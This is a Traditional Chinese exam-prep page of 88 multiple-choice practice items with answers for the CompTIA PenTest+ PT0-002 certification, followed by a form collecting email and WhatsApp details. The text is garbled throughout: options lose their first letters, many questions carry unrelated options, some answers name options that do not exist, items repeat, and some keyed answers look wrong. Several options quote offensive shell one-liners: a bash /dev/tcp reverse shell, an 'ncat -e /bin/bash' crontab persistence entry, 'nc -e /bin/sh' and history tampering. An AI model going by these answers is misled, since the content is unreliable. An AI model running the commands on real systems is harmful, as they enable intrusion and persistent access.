不想錯過任何事?

通過認證考試的技巧

最新考試新聞和折扣資訊

由我們的專家策劃和更新

是的,請向我發送時事通訊

最新 CompTIA PenTest+ PT0-002 考試試卷 - 您的成功之路

對於 CompTIA PenTest+ PT0-002 認證而言,利用可靠的考試資源對於全面備考至關重要。利用大量準確的模擬試題和答案,您可以找出知識差距,強化薄弱環節。信譽良好的學習材料,包括全面的學習指南和視頻課程,可對滲透測試概念進行深入講解。模擬真實考試環境的模擬考試可幫助您熟悉考試形式並有效管理時間。定期利用這些考試資源進行練習可以增強您的信心,提高您在實際考試中應用滲透測試方法的能力。結合高質量的學習材料、練習測試和模擬考試,您將掌握必要的技能和知識,順利通過 CompTIA PenTest+ PT0-002 考試。
參加其他線上考試

問題 #1
滲透測試人員受聘審查無線安全。測試人員部署了一個惡意無線接入點,模仿目標企業 WiFi 的配置。現在,滲透測試員想嘗試強制附近的無線站連接到惡意 AP。下一步,測試員應採取以下哪些步驟?
A. 下文解釋。
查看答案
正確答案: A
問題 #2
在進行滲透測試時,必須消除衝突:
A. 確定專有信息以明文方式存儲。
B. 生在每月的漏洞掃描期間。
C. 在評估過程中發現先前妥協的跡象。
D. 與刑事數字取證調查同時進行。
查看答案
正確答案: D
問題 #3
一家軟件公司聘請了一名滲透測試人員對數據庫服務器進行滲透測試。測試人員獲得了公司隱私政策所使用的各種工具。以下哪種工具最適合用來查找該服務器上的漏洞?
A. penVAS
B. ikto
C. QLmap
D. essus
查看答案
正確答案: C
問題 #4
給滲透測試人員 8 個工作小時的時間來訪問客戶的財務系統,以下哪種技術成功的可能性最大?
A. 圖尾隨進入客戶工作場所的員工
B. 停車場丟棄帶有公司徽標的惡意 USB 密鑰
C. 用暴力破解對外部邊界進行攻擊以獲得立足點
D. 充高級管理人員對員工實施魚叉式網絡釣魚
查看答案
正確答案: D
問題 #5
一家公司聘請了一個滲透測試小組來檢查一家製造廠的網絡物理系統。滲透測試小組立即發現監控系統和 PLC 都連接到了公司內網。如果滲透測試小組做出以下假設,哪種假設最有可能成立?
A. LC不會執行通過網絡注入的命令。
B. 控器和控制器默認處於不同的虛擬網絡中。
C. 制器不會驗證命令的來源。
D. 控系統會檢測到惡意注入的代碼/命令。
查看答案
正確答案: C
問題 #6
一名滲透測試人員利用一個漏洞進入了一個系統。以下是使用的代碼片段:滲透測試人員應在接觸後運行以下哪些命令?
A. rep -v apache ~/bash_history > ~/
B. m -rf /tmp/apache
C. hmod 600 /tmp/apache
D. askkill /IM ג€apacheג€ /F
查看答案
正確答案: B
問題 #7
一名正在進行評估的滲透測試人員發現,一名管理員一直在泄露公司的專有信息。管理員表示願意付錢給測試人員,讓他保持沉默。以下哪項是測試人員應採取的最佳行動?
A. 檢查範圍界定文件,確定滲出是否在範圍之內。
B. 止滲透測試
C. 問題升級。
D. 將發現和互動納入每日報告。
查看答案
正確答案: C
問題 #8
以下哪種工具最有助於收集物聯網設備的供應商和其他安全相關信息,以支持被動偵察?
A. hodan
B. map
C. ebScarab-NG
D. essus
查看答案
正確答案: A
問題 #9
某公司聘請了一名滲透測試人員在網絡上部署和設置一個惡意接入點。以下哪種工具是實現這一目標的最佳工具?
A. ireshark
B. ircrack-ng
C. ismet
D. ifite
查看答案
正確答案: B
問題 #10
Nmap 掃描的結果如下:關於該設備,以下哪個結論是最好的?
A. 明確工作說明
B. 從客戶處獲取資產清單
C. 與所有利益相關者面談
D. 確定所有相關第三方。
查看答案
正確答案: B
問題 #11
在偵查中使用了以下按行編號的 Python 代碼片段:腳本中的以下哪一行編號最有可能導致腳本觸發組織 IDS 中的 "可能的端口掃描 "警報?
A. 1 號線
B. 2 號線
C. 7 號線
D. 8 號線
E. 2 號線
查看答案
正確答案: A
問題 #12
以下哪項是與直接連接到互聯網的物聯網設備相關的最常見漏洞?
A. 不支持的操作系統
B. 受 DDoS 攻擊的可能性
C. 無法聯網
D. 在默認密碼
查看答案
正確答案: D
問題 #13
一名滲透測試人員在進行滲透測試時,發現網絡流量不再到達客戶的 IP 地址。以下哪項最有可能描述了所發生的情況?
A. 透測試人員測試了錯誤的資產。
B. 劃過程未能確保通知所有小組。
C. 戶還沒有準備好開始評估。
D. 透測試人員的聯繫信息有誤。
查看答案
正確答案: B
問題 #14
滲透測試人員接到的任務是攻擊 192.168.1.0/24 範圍內的一系列目標,儘可能少觸發警報和反措施。以下哪種 Nmap 掃描語法能最好地實現這一目標?
A. map -sT -vvv -O 192
B. map -sV 192
C. map -sA -v -O 192
D. map -sS -O 192
查看答案
正確答案: D
問題 #15
在滲透測試過程中,測試人員能夠將 example.com/login.php?id=5 的 URL 值更改爲 example.com/login.php?id=10,從而訪問網絡應用程序。滲透測試人員利用了以下哪些漏洞?
A. 令注入
B. 證失敗
C. 接對象引用
D. 站腳本
查看答案
正確答案: C
問題 #16
物理滲透測試人員需要進入一家公司的辦公室,在不引起保安懷疑或注意的情況下收集敏感信息。測試人員觀察到,公司的檢票口不掃描徽章,員工去洗手間時將徽章放在桌子上。測試人員可以使用以下哪種技術進入辦公室?
A. 點擊劫持
B. 話劫持
C. 數污染
D. Cookie 劫持
E. 站腳本
查看答案
正確答案: CD
問題 #17
一家安全公司正在與客戶討論滲透測試的結果。根據測試結果,客戶希望將剩餘時間集中在一個關鍵網段上。以下哪項最恰當地描述了正在採取的行動?
A. 大限度地提高發現漏洞的可能性
B. 重新確定目標/目的的優先次序
C. 消除誤報的可能性
D. 低客戶環境的風險
查看答案
正確答案: B
問題 #18
以下哪種評估方法最有可能對綜合監控系統環境造成危害?
A. 探並破解相關 WiFi 設備上的 WPS PIN 碼。
B. 刪除設備上的用戶地址簿。
C. 斷兩個藍牙設備之間的連接。
D. 向設備發送文本信息。
查看答案
正確答案: A
問題 #19
在以應用程序開發人員團隊爲目標受衆編寫的靜態應用程序安全測試最終報告中,以下哪項最重要?
A. 所用滲透測試方法執行摘要
B. 料清單,包括用品、分包合同和評估期間產生的費用
C. 功入侵軟件後的定量影響評估
D. 安全類型轉換操作實例的代碼上下文
查看答案
正確答案: D
問題 #20
滲透測試人員發現了一個漏洞,該漏洞提供了通過發現遍歷上傳到路徑的能力。通過此漏洞發現的一些文件是:以下哪種方法是幫助攻擊者獲得受影響計算機內部訪問權限的最佳方法?
A. 編輯被發現的文件,加入一行遠程回調代碼。
B. 下載
C. 編輯 smb
D. 下載 smb
查看答案
正確答案: C
問題 #21
一個紅色小組在一次任務中訪問了客戶的內部網絡,並使用 Responder 工具捕獲了重要數據。
A. 多次握手
B. IP 地址
C. 密文件傳輸
D. 過 SMB 發送的用戶哈希值
查看答案
正確答案: D
問題 #22
熱點(不支持拖放)您是一名安全分析師,負責加固網絡服務器。如果您想恢復模擬的初始狀態,請單擊 "全部重置 "按鈕:
A. 案見說明部分。
查看答案
正確答案: A
問題 #23
滲透測試人員需要將端口掃描結果上傳到集中式安全工具。以下哪個命令可以讓測試人員以可互換格式保存結果?
A. map -iL 結果 192
B. map 192
C. map -A 192
D. map 192
查看答案
正確答案: C
問題 #24
滲透測試人員希望通過嘗試使用電子郵件附件進行數據外滲來驗證 DLP 產品的有效性。測試人員應選擇以下哪種技術來完成這項任務?
A. 隱寫術
B. 刪除元數據
C. 加密
D. ncode64
查看答案
正確答案: A
問題 #25
一名滲透測試人員利用一個漏洞進入了一個系統。以下是使用的代碼片段:滲透測試人員應在接觸後運行以下哪些命令?
A. rep -v apache ~/bash_history > ~/
B. m -rf /tmp/apache
C. hmod 600 /tmp/apache
D. askkill /IM ?€apache?€ /F
查看答案
正確答案: B
問題 #26
以下哪條命令允許滲透測試人員允許文件所有者執行 shell 腳本?
A. hmod u+x script
B. hmod u+e script
C. hmod o+e script
D. hmod o+x script
查看答案
正確答案: A
問題 #27
一名正在進行漏洞評估的滲透測試人員發現,一個網段上的 ICMP 已被禁用。以下哪項可用於對網段進行拒絕服務攻擊?
A. 精靈
B. 平汛
C. raggle
D. 死亡之平
查看答案
正確答案: C
問題 #28
以下哪種情況最有可能需要重新驗證以前的安全評估?
A. 發現漏洞後
B. 合併或收購之後
C. 組織更新其網絡防火牆配置時
D. 大部分漏洞都得到修復時
查看答案
正確答案: B
問題 #29
滲透測試人員在一次未知環境測試中運行了 ping `"A 命令,結果返回了一個 128 TTL 數據包。以下哪個操作系統最有可能返回這種類型的數據包?
A. 窗口
B. 蘋果
C. inux
D. ndroid
查看答案
正確答案: A
問題 #30
滲透測試人員在 Windows 服務器上運行了以下命令:測試人員在提交最終報告後應執行以下哪項操作?
A. 刪除計劃的批處理作業。
B. 關閉反向外殼連接。
C. 級 svsaccount 權限
D. 刪除測試人員創建的憑證。
查看答案
正確答案: D
問題 #31
滲透測試人員希望針對網絡設備上的 SSH 守護進程測試常用密碼列表。下面哪種工具最適合用於此目的?
A. ashcat
B. imikatz
C. atator
D. 膛手約翰
查看答案
正確答案: C
問題 #32
一家新成立的安全公司正在接待第一個客戶。客戶只允許在周末進行測試,周一上午需要結果。然而,評估團隊直到周一才如願進入環境。在評估開始之前,安全公司應該獲取以下哪項內容?
A. 已籤署的工作說明書
B. 確的用戶賬戶和相關密碼
C. 估的預期時間框架
D. 戶的適當緊急聯繫人
查看答案
正確答案: D
問題 #33
在滲透測試過程中,一名顧問對客戶進行了偵查,以確定網絡釣魚活動的潛在目標。以下哪種方法可以讓顧問快速檢索技術和賬單聯繫人的電子郵件地址,而不會觸發客戶的任何網絡安全工具?
A. OW
B. LA
C. ROE
D. DA
查看答案
正確答案: BC
問題 #34
一名滲透測試人員完成了對被評估公司生產的各種軟件產品的分析。測試人員發現,在過去幾年中,該公司在多個產品中加入了易受攻擊的第三方模塊,儘管開發的有機代碼質量非常好。滲透測試人員應在報告中包含以下哪些建議?
A. 在工具鏈中添加依賴性檢查器
B. 已提交的代碼進行常規靜態和動態分析。
C. 部署前驗證 API 安全設置。
D. 編譯後的二進制文件進行模糊測試
查看答案
正確答案: A
問題 #35
對網絡交換機進行 Nmap 掃描後發現:以下哪項技術控制最有可能成爲該設備的首選建議?
A. 密密碼
B. 系統硬化技術
C. 因素身份驗證
D. 網絡分段
查看答案
正確答案: B
問題 #36
滲透測試人員希望通過在目標和具有 FTP 協議的服務器之間部署工作站作爲路徑上攻擊來獲取 FTP 憑據。以下哪種方法是實現這一目標的最佳方法?
A. 待下一次登錄,然後對服務器進行降級攻擊。
B. 使用 Wireshark 捕捉流量。
C. 服務器進行暴力破解攻擊
D. 對服務器使用 FTP 漏洞。
查看答案
正確答案: B
問題 #37
將字符串值附加到另一個字符串上被稱爲 "附加":
A. 編
B. 接
C. 接
D. 連接
查看答案
正確答案: C
問題 #38
基於合規性的滲透測試主要涉及以下方面
A. 從受保護網絡獲取 PII。
B. 繞過邊緣設備的保護。
C. 確定特定安全標準的有效性。
D. 從受保護網絡獲取特定信息。
查看答案
正確答案: C
問題 #39
一家公司聘請了一名滲透測試人員對其員工進行社交工程測試。雖然測試人員在公司網站上沒有找到任何員工的電話號碼,但測試人員了解到完整的電話號碼目錄幾個月前在網站上公布過。滲透測試人員應在以下哪個地方查找員工的電話號碼?
A. 網絡檔案
B. itHub
C. 件元數據
D. 地下論壇
查看答案
正確答案: A
問題 #40
一家公司獲得了雲服務提供商的漏洞掃描許可,現在希望測試其託管數據的安全性。
A. c 10
B. owershell -exec bypass -f \\\\10
C. ash -i >& /dev/tcp/10
D. get 10
查看答案
正確答案: A
問題 #41
對裝有 SCADA 設備的環境進行滲透測試會帶來額外的安全風險,因爲:
A. 設備會產生更多熱量,消耗更多電能。
B. 備已過時,無法再更換。
C. 議更難理解。
D. 備可能會對物理世界造成影響。
查看答案
正確答案: D
問題 #42
滲透測試人員正試圖快速發現子網中的實時主機,以下哪些命令可以執行 ping 掃描?
A. map -sn 10
B. map -sV -A 10
C. map -Pn 10
D. map -sT -p- 10
查看答案
正確答案: A
問題 #43
一名滲透測試人員對一臺內部網絡服務器進行了暴力破解,並運行了一條命令,結果輸出如下:但是,當滲透測試人員嘗試瀏覽 URL http://172.16.100.10:3000/profile 時,卻顯示了一個空白頁面。以下哪項最有可能是導致沒有輸出的原因?
A. 火牆上的 HTTP 端口未打開。
B. 試人員在執行命令前沒有運行 sudo。
C. 絡服務器使用 HTTPS 而不是 HTTP。
D. URI 返回服務器錯誤。
查看答案
正確答案: D
問題 #44
滲透測試人員從被入侵的網絡服務器上下載了一個 Java 應用程序文件,並通過查看以下日誌確定了如何調用該文件:要驗證 Java 應用程序是否使用了套接字加密,滲透測試人員需要遵循以下哪個步驟的順序?
A. 運行應用程序漏洞掃描,然後識別應用程序使用的 TCP 端口。
B. 運行連接到調試器的應用程序,然後查看應用程序的日誌。
C. 匯編二進制代碼,然後確定斷點。
D. 使用 Wireshark 啓動數據包捕獲,然後運行應用程序。
查看答案
正確答案: D
問題 #45
滲透測試人員在一個未受保護的內部源代碼庫中發現了一個網絡應用程序使用的 PHP 腳本。在查看代碼後,測試人員確定了以下內容:滲透測試人員將使用以下哪種工具組合來利用該腳本?
A. 頭蛇和嘎吱嘎吱
B. etcat 和 cURL
C. 嗝套件和 DIRB
D. map 和 OWASP ZAP
查看答案
正確答案: B
問題 #46
一名滲透測試員正在向一家公司的首席法律顧問解釋 MITRE ATT&CK 框架。測試員最有可能將以下哪項描述爲該框架的優點?
A. 了解安全入侵的策略有助於瓦解入侵。
B. 爲框架一部分的腳本可直接導入 SIEM 工具。
C. 方法可用於更好地估算事故成本。
D. 框架是靜態的,可確保安全程序隨着時間的推移保持穩定。
查看答案
正確答案: A
問題 #47
一名滲透測試人員受僱對一家機構的辦公室進行物理安全評估。在對環境進行了幾個小時的監控後,滲透測試人員注意到,一些員工到附近的一家餐廳喫午飯,並在取餐時將隨身物品放在桌子上,無人看管。以下哪種技術最有可能在不引起太多警報的情況下合法進入該組織的大樓?
A. 尾隨
B. 圾箱潛水
C. 部衝浪
D. 章克隆
查看答案
正確答案: D
問題 #48
以下哪項是對 OWASP Top 10 的最佳描述?
A. 編輯被發現的文件,加入一行遠程回調代碼。
B. 下載
C. 編輯 smb
D. 下載 smb
查看答案
正確答案: AC
問題 #49
滲透測試人員已訪問了首席執行官(CEO)的公司內部電子郵件。以下哪種方法最有可能奏效?
A. 嘗試從首席執行官的賬戶中獲取 S/MIME 使用的私人密鑰。
B. 從首席執行官的賬戶發送電子郵件,申請新賬戶。
C. 郵件服務器橫向移動到域控制器。
D. 試提升郵件服務器的權限,以獲得 root 訪問權限。
查看答案
正確答案: D
問題 #50
在規劃滲透測試工作時,明確表達有關一天中最佳測試執行時間的規則非常重要,因爲:
A. 可能會違反安全合規條例或法律。
B. 測試會增加檢測實際 APT 的難度。
C. 測試增加了防禦性網絡和威脅獵殺團隊的工作量。
D. 業務和網絡運行可能受到影響。
查看答案
正確答案: D
問題 #51
在規劃滲透測試工作時,明確表達有關一天中最佳測試執行時間的規則非常重要,因爲:
A. 可能違反安全合規條例或法律。
B. 測試會增加檢測實際 APT 的難度。
C. 測試增加了防禦性網絡和威脅獵殺團隊的工作量。
D. 業務和網絡運行可能受到影響。
查看答案
正確答案: D
問題 #52
一家安全公司受僱對一家公司進行外部滲透測試。該公司收到的唯一信息是公司名稱。以下哪種被動偵察方法最有可能取得積極的初步結果?
A. 門製作並向公司主要領導發送網絡釣魚郵件。
B. 公司的外部網站進行漏洞掃描。
C. 行公司的供應商/供應鏈。
D. 取網頁和社交網站。
查看答案
正確答案: D
問題 #53
某公司聘請了一名滲透測試人員對網絡進行漏洞掃描。測試已確認在已知環境中進行。以下哪項是在執行評估前正確識別系統的最佳選擇?
A. 資產清單
B. DNS 記錄
C. 絡應用掃描
D. 全面掃描
查看答案
正確答案: A
問題 #54
滲透測試人員希望在不被客戶 IDS 檢測到的情況下掃描目標網絡,以下哪種掃描最有可能避免被檢測到?
A. 站點發送取消驗證幀。
B. 對所有 2
C. 惡意 AP 設置爲在動態頻率選擇信道內廣播。
D. 改惡意 AP 配置,使其不使用預共享密鑰。
查看答案
正確答案: C
問題 #55
滲透測試人員在暫存服務器上運行以下命令: python -m SimpleHTTPServer 9891 以下哪條命令可用於將名爲 exploit 的文件下載到目標計算機上執行?
A. c 10
B. owershell -exec bypass -f\\10
C. ash -i >& /dev/tcp/10
D. get 10
查看答案
正確答案: D
問題 #56
滲透測試人員在一次網絡應用程序測試中捕獲了以下流量:測試人員應使用以下哪種方法可視化正在傳輸的授權信息?
A. 使用 UTF-8 解碼授權標頭。
B. 使用 bcrypt 解密授權頭。
C. 用 Base64 解碼授權標頭。
D. 使用 AES 對授權標頭進行解密。
查看答案
正確答案: C
問題 #57
滲透測試人員成功訪問了移動客戶筆記本電腦上的 Windows 工作站,以下哪項可用於確保測試人員能夠保持對系統的訪問?
A. chtasks /create /sc /ONSTART /tr C:\\Temp|WindowsUpdate
B. mic startup get caption,command
C. rontab -l; echo ג€@reboot sleep 200 && ncat -lvp 4242 -e /bin/bashג€)| crontab 2>/dev/null
D. udo useradd -ou 0 -g 0 用戶
查看答案
正確答案: A
問題 #58
在確定被測應用程序已被惡意軟件入侵後,滲透測試人員應執行以下哪項工作?
A. 分析惡意軟件,了解其功能。
B. 集適當證據,然後刪除惡意軟件。
C. 行根本原因分析,找出惡意軟件是如何侵入的。
D. 立即刪除惡意軟件。
E. 停止評估並通知緊急聯繫人。
查看答案
正確答案: E
問題 #59
首席信息安全官希望評估公司電子商務應用程序的安全性。滲透測試人員應首先使用以下哪種工具從應用程序中獲取相關信息而不觸發警報?
A. QLmap
B. DirBuster
C. 3af
D. WASP ZAP
查看答案
正確答案: D
問題 #60
一名滲透測試人員正在探索客戶的網站。滲透測試人員執行 curl 命令,得到以下信息:滲透測試人員最好使用以下哪種工具進一步探索該網站?
A. 打嗝套房
B. DirBuster
C. WPScan
D. WASP ZAP
查看答案
正確答案: C
問題 #61
一家公司聘請了一名滲透測試人員在網絡上部署和設置一個惡意接入點。以下哪種工具是實現這一目標的最佳工具?
A. ireshark
B. 氣裂縫
C. 思妙想
D. ifite
查看答案
正確答案: B
問題 #62
一家公司獲得了雲服務提供商的漏洞掃描許可,現在希望測試其託管數據的安全性。
A. 敏感客戶數據是否可公開訪問
B. 和客戶機之間的連接是否安全
C. 戶的員工是否接受過正確使用平臺的培訓
D. 是否使用安全的 SDLC 開發了雲應用程序
查看答案
正確答案: A
問題 #63
一位新客戶與一家滲透測試公司籤訂了爲期一個月的合同,針對客戶的新服務進行各種安全評估。客戶希望在評估完成後不久就公開新服務,並計劃在服務公開後修復任何發現(關鍵問題除外)。客戶希望報告結構簡單,不希望每天都收到評估結果。
A. 確定客戶要求的格式。
B. 確定應立即上報客戶的風險閾值。
C. 定潛在誤報的方法。
D. 確定報告的首選星期。
查看答案
正確答案: B
問題 #64
滲透測試人員使用 dirb 工具掃描網絡服務器後得到以下結果:以下哪個元素最有可能包含對滲透測試人員有用的信息?
A. ndex
B. 關於
C. nfo
D. ome
查看答案
正確答案: B
問題 #65
滲透測試員爲即將進行的滲透測試準備了以下網絡釣魚電子郵件:滲透測試員最常使用以下哪項來影響網絡釣魚目標點擊鏈接?
A. 悉和相似
B. 權力和緊迫性
C. 匱乏和恐懼
D. 會證明和貪婪
查看答案
正確答案: B
問題 #66
滲透測試活動已經結束,並與客戶審查了初步結果。以下哪項最恰當地描述了業務約定的下一步?
A. 戶驗收並籤署最終報告
B. 安排後續行動和重新測試
C. 鑑定結果和提交報告
D. 審查參與期間的經驗教訓
查看答案
正確答案: A
問題 #67
一名滲透測試人員最近實施了一次社交工程攻擊,測試人員在當地一家咖啡店找到了目標公司的一名員工,並逐漸與該員工建立了關係。在該員工生日那天,測試人員送給他一個外置硬盤作爲禮物。該測試人員使用了以下哪種社交工程攻擊?
A. 絡釣魚
B. 尾隨
C. 餌
D. 肩部衝浪
查看答案
正確答案: C
問題 #68
在滲透測試過程中觸發了安全警報,公司對此表示擔憂。以下哪項是公司應該採取的下一步行動?
A. 止滲透測試
B. 進行事件響應。
C. 滲透測試人員解除衝突。
D. 設警報來自滲透測試。
查看答案
正確答案: C
問題 #69
滲透測試人員獲得了系統訪問權限,並能夠遷移到用戶進程:根據上述輸出,滲透測試人員正在執行以下哪些操作? 請選擇兩項。
A. 測試人員輸入了錯誤的 IP 地址。
B. 命令需要ג€"端口 135 "選項。
C. 務器上不存在 RDP 賬戶。
D. owerShell需要管理員權限。
查看答案
正確答案: CD
問題 #70
在 Python 中,以下哪些表達式會使變量 val 增加一個?(選擇兩個)。
A. map ג "T3 192
B. map ג "P0 192
C. map ג€"T0 192
D. map ג "A 192
查看答案
正確答案: CF
問題 #71
滲透測試人員在一臺計算機上運行 unshadow 命令,測試人員下一步最有可能使用以下哪種工具?
A. 膛手約翰
B. 螅
C. 米卡茲
D. 隱和亞伯
查看答案
正確答案: A
問題 #72
說明通過瀏覽器查看網站的所有組件,以確定是否存在漏洞。僅修復證書、源代碼或 cookie 中最高級別的漏洞。如果您想隨時恢復模擬的初始狀態,請單擊 "全部重置 "按鈕。
A. 下文解釋。
查看答案
正確答案: A
問題 #73
滲透測試人員訪問了一個網絡設備,該設備的接口上有一個以前未知的 IP 範圍。進一步研究發現,這是一條通向第三方供應商的始終在線 VPN 通道。以下哪項是滲透測試人員應採取的最佳行動?
A. 利用隧道作爲樞紐,連接其他內部設備。
B. 略 IP 範圍,因爲它不在範圍內。
C. 停止評估並通知緊急聯繫人。
D. 描 IP 範圍,查找可利用的其他系統。
查看答案
正確答案: C
問題 #74
一家軟件公司聘請了一名安全顧問來評估公司軟件開發實踐的安全性。該顧問選擇通過對軟件二進制執行模糊處理來開始偵察。安全顧問最有可能發現以下哪個漏洞?
A. 認證方案
B. 字符串存儲的憑證
C. 衝區溢出
D. 優化資源管理
查看答案
正確答案: C
問題 #75
以下哪條命令允許滲透測試人員允許文件所有者執行 shell 腳本?
A. hmod u+x script
B. hmod u+e script
C. hmod o+e script
D. hmod o+x script
查看答案
正確答案: A
問題 #76
一名滲透測試人員發現,屬於任務範圍內的一臺網絡服務器已被後門入侵。下一步,滲透測試人員應採取以下哪種措施?
A. 證後門木馬並進行歸因。
B. 利用後門支持交戰。
C. 續參與,並將 "後門 "調查結果納入最終報告。
D. 立即通知客戶後門的情況。
查看答案
正確答案: D
問題 #77
滲透測試人員下載了以下 Perl 腳本,該腳本可用於識別網絡交換機中的漏洞。但是,該腳本無法正常運行。測試人員應進行以下哪些更改才能使腳本按預期運行?
A. 將第 2 行改爲 $ip= ג€10
B. 刪除第 3、5 和 6 行。
C. 除第 6 行。
D. 將第 7 行以下的所有行移至腳本頂部。
查看答案
正確答案: A
問題 #78
一家諮詢公司正在完成範圍界定期間的 ROE,以下哪些內容應包括在 ROE 中?
A. 評估費用
B. 報告分發
C. 測試限制
D. 任
查看答案
正確答案: C
問題 #79
在一次滲透測試中,一臺 CentOS 計算機被利用。在最初的偵查過程中,滲透測試人員發現內部 Sendmail 服務器上的 25 端口是開放的。爲了保持隱蔽性,測試人員在攻擊計算機上運行了以下命令:要進一步進入目標網絡,以下哪個命令是最佳命令?
A. c 10
B. sh 10
C. c 127
D. sh 127
查看答案
正確答案: C
問題 #80
一名滲透測試人員獲得了一臺基於 Linux 的文件服務器的 root 訪問權限,並希望在重啓後保持持久性。以下哪種技術能最好地支持這一目標?
A. 創建一次性系統服務以建立反向外殼
B. 獲取 /etc/shadow 並強行輸入 root 密碼
C. un the nc ג€"e /bin/sh <ג€¦> command
D. 向移動在 LDAP 上創建用戶帳戶
查看答案
正確答案: A
問題 #81
滲透測試人員正在開始一項評估,但他只掌握了目標公司的公開信息。以下哪項描述了評估的範圍?
A. 部分已知環境測試
B. 已知環境測試
C. 知環境測試
D. 物理環境測試
查看答案
正確答案: C
問題 #82
首席信息安全官希望滲透測試人員評估最近安裝的防火牆是否保護了一個子網,該子網連接着許多有幾十年歷史的舊系統。滲透測試人員決定運行操作系統發現和全端口掃描,以識別所有系統和任何潛在漏洞。在運行掃描之前,滲透測試人員應考慮以下哪項?
A. 描時間
B. 帶寬限制
C. 資產清單和版本
D. 描類型
查看答案
正確答案: C
問題 #83
滲透測試員爲即將進行的滲透測試準備了以下網絡釣魚電子郵件:滲透測試員最常使用以下哪項來影響網絡釣魚目標點擊鏈接?
A. 悉和相似
B. 威性和緊迫性
C. 乏和恐懼
D. 會證明與貪婪
查看答案
正確答案: B
問題 #84
一家安全公司受聘執行一項範圍廣泛的內部威脅評估,試圖進入存放 PII 和工資數據的人力資源服務器。滲透測試人員被分配到一個內部網絡起始位置。如果執行以下哪項行動,屬於評估範圍內的道德行爲?
A. 用 SQL 數據庫中的配置弱點
B. 截出站 TLS 流量
C. 過向企業級更新服務器注入惡意軟件來訪問主機
D. 用內部 CA 的漏洞籤發虛假客戶證書
E. 域控制器上建立和維護持久性
查看答案
正確答案: A
問題 #85
以下哪些網絡應用程序安全風險是 OWASP Top 10 v2017 的一部分?(請選擇兩項)。
A. 於 TCP/22 上的事務處理心跳擴展數據包的方式,該設備可能存在 Heartbleed 漏洞,允許攻擊者從進程內存中獲取敏感信息。
B. 設備很可能是帶內管理服務的網關。
C. 設備很可能是通過 TCP/443 轉發請求的代理服務器。
D. DNSSEC 驗證之前,用於從數據包中提取 DNS 名稱的方法存在緩衝區溢出漏洞,因此該設備可能存在遠程代碼執行漏洞。
查看答案
正確答案: BE
問題 #86
滲透測試人員希望識別可被利用的 CVE,以便在運行 SSHD 的 Linux 服務器上執行任務。
A. 針對目標運行 nmap,並設置 -O、-p22 和 -sC 選項。
B. 針對目標運行設置了 -sV 和 -p22 選項的 nmap。
C. 針對目標運行 nmap,並設置 --script vulners 選項。
D. 對目標運行設置了 -sA 選項的 nmap。
查看答案
正確答案: D
問題 #87
以下哪些 Nmap 命令會返回潛在攻擊者可能感興趣的易受攻擊端口?
A. map 192
B. map 192
C. map 192
D. map 192
查看答案
正確答案: C
問題 #88
以下哪個文件描述了滲透測試人員的具體活動、交付成果和時間表?
A. DA
B. SA
C. OW
D. 諒解備忘錄
查看答案
正確答案: C

提交後看答案

請提交您的電子郵件和WhatsApp以獲取問題的答案。

注意:請確保您的電子郵件 ID 和 Whatsapp 有效,以便您獲得正確的考試結果。

電子郵件:
WhatsApp/電話號碼: